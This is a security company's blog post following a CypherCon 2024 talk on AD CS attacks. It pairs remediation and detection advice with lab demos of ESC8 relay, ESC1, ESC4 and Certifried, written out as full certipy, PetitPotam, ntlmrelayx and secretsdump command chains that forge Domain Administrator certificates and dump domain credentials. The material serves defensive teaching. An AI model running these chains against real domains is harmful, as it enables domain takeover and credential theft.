Attacks on Active Directory Certificate Services (AD CS) Explained - CypherCon 2024 Follow-up

Ryan Zagrodnik
May 17, 2024

This is a follow-up blog post from our CypherCon 2024 presentation. The slides are located here: https://x.com/TheL0singEdge/status/1776101737461399780

Active Directory Certificate Services (AD CS) is a crucial component of many organizations' security infrastructure, responsible for public key infrastructure (PKI) and managing digital certificates. Despite its importance, AD CS can also be a target for various security threats. This blog post delves into common vulnerabilities in AD CS, explains how these can be exploited, and outlines effective remediation strategies to protect your systems.

TL;DR Here's How to Check and Fix:

Secure your HTTP endpoints (mitigates KrbRelayUp/PetitPotam/others)

  • Remove all AD CS HTTP endpoints (Best option)
  • If above not possible:
    • Enforce HTTPS and Enabled Protection for Authentication (EPA)
  • Also helps:
    • Disable NTLM auth on IIS and on your AD CS servers
    • Disable NTLM auth on your AD CS servers
  • PowerShell scripts to discover overly-permissive AD objects ACLs
  • Discover Dangerous Flag on Certificate Authority (CA)
    • Check if the Flag is Set:
      • certutil -getreg policy\EditFlags
    • If EDITF_ATTRIBUTESUBJECTALTNAME2 set on ANY CA is can be abused
      • Unset the Dangerous Flag
        • certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
  • PSPKIAudit: A PowerShell toolkit for auditing AD CS

Most Common Coercion Vulnerabilities:

These vulnerabilities "coerce" your Domain Controller into authenticating to us 🙂

  • PrinterBug (MS-RPRN)
  • PetitPotam (MS-EFSR)
  • ShadowCoerce (MS-FSRVP)
  • DFSCoerce (Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM))

No Full Patches

  • Probably never will because abuse is intended functionality and M$ would have to get rid of NTLM altogether.
  • Most except shadowcoerce is still exploitable w/ valid domain creds.
  • Ensure NetNTLMV1 is disabled on all of your Domain Controllers!

Demo - ESC8 - Coerce to Domain Admin using Game of Active Directory:

Source: https://mayfly277.github.io/posts/GOADv2-pwning-part6/

certipy find -u 'robb.stark' -dc-ip 192.168.56.11 -p 'sexywolfy'

Responder.py -I vboxnet0 --disable-ess --lm

PetitPotam.py 192.168.56.1 meereen.essos.local

To make this attack work we will need:

  • ADCS running on the domain with web enrollment enabled.
  • A working coerce method (authenticated printerbug or other coerce method)
  • There is a template to exploit ESC8, by default on an active directory: DomainController
  • Ensure the web enrollement running: http://192.168.56.23/certsrv/certfnsh.asp

ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

PetitPotam.py 192.168.56.1 meereen.essos.local

gettgtpkinit.py -pfx-base64 $(cat cert.b64) 'essos.local'/'meereen$' 'meereen.ccache'

Get a TGT for meereen so we can launch a DCsync and get all the ntds.dit content.

export KRB5CCNAME=meereen.ccache

secretsdump.py -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

Demo - ESC8 - when an Enrollment Service has installed and enabled Web Enrollment via HTTP:

  1. Requesting Certificate template information
  2. Template TestUser allows:
  3. "Enroller Supplies Subject"
    • "Enrollment Rights to Domain Computers"
    • Request certificate under the context of reguser (user with only Domain Users Privilege) with an SPN for Domain Administrator "[email protected]".
  4. Take supplied Certificate (administrator_dc.pfx) and request a TGT and then the NTLM hash.
  5. Profit. DCSync, etc. - See https://github.com/ly4k/Certipy/blob/main/README.md#esc1

Demo - ESC1 - when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN):

  1. List certificates available (show esc4 template)
  2. Abuse write permissions of domain users and make template vulnerable to Escalation 1.
  3. Display original and overwritten certificate side by side.
  4. Escalation 1.
    • "Enroller Supplies Subject"
    • "Enrollement Rights to Domain Computers"
    • Request certificate under the context of bob (user with only Domain Users Privilege) with an SPN for Domain Administrator "[email protected]".
    • Take supplied Certificate (administrator.pfx) and request a TGT and then the NTLM hash.
  5. Profit. Example, extract the krbtgt for further hack.
certipy-ad find -u bob -dc-ip 192.168.101.250 -text -output original

certipy-ad find -u bob -dc-ip 192.168.101.250 -text -output overwritten

certipy-ad template -dc-ip 192.168.101.250 -username bob -template 'Escalation4Template' -save-old

certipy-ad req -username bob -ca drop-lemon-ca -template 'Escalation4Template' -upn [email protected] -dc-ip 192.168.101.250

certipy-ad auth -dc-ip 192.168.101.250 -pfx administrator.pfx

impacket-secretsdump 'drop.labs/[email protected]' -target 192.168.101.250 -just-dc-user krbtgt -hashes aad3b435b51404eeaad3b435b51404ee:5d826aa79e790881c2042aad77d0e6a1

Demo - ESC4 - When a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.


Shows ESC4 to ESC1 only this time using machine account


PreReq - Control over a Domain User account.

  1. Templates only allow Domain Computers To Enroll (Think Machine Certificates for 802.1x)
  2. Default Policy Allows Domain Users To Create 10 Machine accounts. So lets Create one called regusersPC.
  3. Repeat Escalation 1.
  4. Template TestUser allows:
    • "Enroller Supplies Subject"
    • "Enrollment Rights to Domain Computers"
  5. Request certificate under the context of reguserPC (user with only Domain Computers Privilege) with an SPN for Domain Administrator "[email protected]".
  6. Take supplied Certificate (administrator_dc.pfx) and request a TGT and then the NTLM hash.
  7. Profit DCSync, etc.

Demo - (Certifried CVE-2022-26923) Abuses Active Directory Certificate Services (AD CS) to request machine certificates with arbitrary attacker-controlled DNS host names. Was patched as part of Microsoft's May 2022 security updates:

  1. Create a machine account (testmachine) using a domain user account.
    • Certipy creates the machine account and under the dnsHostname field lists the domain controllers hostname with domain.
  2. Request a certificate using the Default Machine template
  3. Requesting a certificate using the testmachine account with the modified dnsHostName causes the CA to provide a Certificate for the dc (dc01.bysurvey.com).
  4. Take supplied Certificate dc01.pfx and request a TGT and then the NTLM hash.

https://www.hackthebox.com/blog/cve-2022-26923-certifried-explained
https://tryhackme.com/r/room/cve202226923

Detecting Potential Abuse:

  • Event ID 4886
    • Certificate Services received a certificate request.
  • Event ID 4877/4876
    • Certificate Services approved a certificate request and issued a certificate.
  • Event ID 5058/5061
    • Account Used Key Storage Provider on Key File
  • Event ID 5059
    • Account Used KSP Exported a Key File
  • Event ID 4663
    • Process Access Private Key

References:

  1. ESC9 – ESC10 - https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
  2. Certipy - https://github.com/ly4k/Certipy
  3. Certified Preowned Blog - https://posts.specterops.io/certified-pre-owned-d95910965cd2
  4. Certified Preowned Whitepaper - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
  5. PSPKIAudit - https://github.com/GhostPack/PSPKIAudit
  6. Microsoft "Securing PKI" - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786423(v=ws.11)
  7. Certipy 4.0 - https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
  8. Abusing Active Directory Certificate Services (Part 3) - https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
  9. ADCShunter - https://github.com/danti1988/adcshunter
  10. Shadow Credentials: Workstation takeover edition - https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition
  11. ADCS Attack Paths in BloodHound - https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-1-799f3d3b03cf
  12. TryHackMe - https://tryhackme.com/room/adcertificatetemplates and https://tryhackme.com/room/cve202226923
  13. ADCSCoercePotato - https://github.com/decoder-it/ADCSCoercePotato/
  14. Top 10 Ways to Improve Active Directory Security Quickly - Trimarc Security https://youtu.be/Og5xfph7Gt0
  15. ESC9 and ESC10 - https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
  16. ESC11 - https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
  17. ESC12 - https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm
  18. ESC13 - https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
  19. Certified Pre-Owned: Abusing Active Directory Certificate Services - https://youtu.be/ejmAIgxFRgM
  20. Exploiting CVE-2022-26923 by Abusing AD CS | TryHackMe - https://youtu.be/HBRCI5O35R8

Stay safe out there on the cybers - @TheLosingEdge

Are you ready to start your technology journey? The friendly experts at SynerComm are here to help.

From design to deployment to troubleshooting and everything in between, the friendly experts at SynerComm are always here to help.
linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram